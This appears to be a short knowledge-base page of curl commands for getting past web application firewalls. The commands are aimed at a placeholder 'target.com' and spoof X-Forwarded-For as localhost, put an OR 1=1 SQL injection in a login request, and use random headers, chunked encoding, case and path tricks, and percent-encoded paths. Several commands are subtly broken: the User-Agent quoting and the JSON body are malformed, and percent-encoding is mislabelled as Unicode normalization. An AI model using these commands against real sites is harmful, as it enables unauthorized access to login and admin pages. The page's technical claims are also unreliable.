cURL WAF Bypass

This cURL command has been used to bypass a WAF.

curl -X POST "https://target.com/login" \
-H "User-Agent" Mozilla/5.0 (Windows NT 10.0; Win64; x64)" \
-H "X-Forwarded-For: 127.0.0.1" \
-H "Accept-Language: en-US,en;q=0.9" \
-H "Content-Type: application/json" \
--data-raw '{"username":admin'\'' OR 1=1--", "password":"any"}'

The forwarded for tricks the web firewall to thinking that the request is from a trusted source. There also is a SQLi contained in the data without breaking the query. You can also add random but valid headers to bypass WAFs that only block requests with missing or abnormal headers.

curl -X GET "https://target.com/admin" \
-H "Random-Header: $(openssl rand -hex 8)" \
-H "Referer: https://google.com"

You can also use chunked transfer encoding for some WAF

curl -X POST "https://target.com/api" \
-H "Transfer-Encoding: chunked" \
--data-binary @malicious_payload.txt

To bypass case-sensitive regex, you can use

curl -X GET "https://target.com/ADMIN/../LoGiN" \
-H "User-Agent: cURL/7.68.0"

You can also use Unicode normalization to confuse the firewall

curl -X GET "https://target.com/%75%73%65%72" \
-H "Accept: */*"

Backlinks

[[ffuf]]
IP Addresses
[[SQL Injection]]
[[Web Application Firewalls (WAF)]]

Knowledge Base

cURL WAF Bypass

Backlinks

Keep In Touch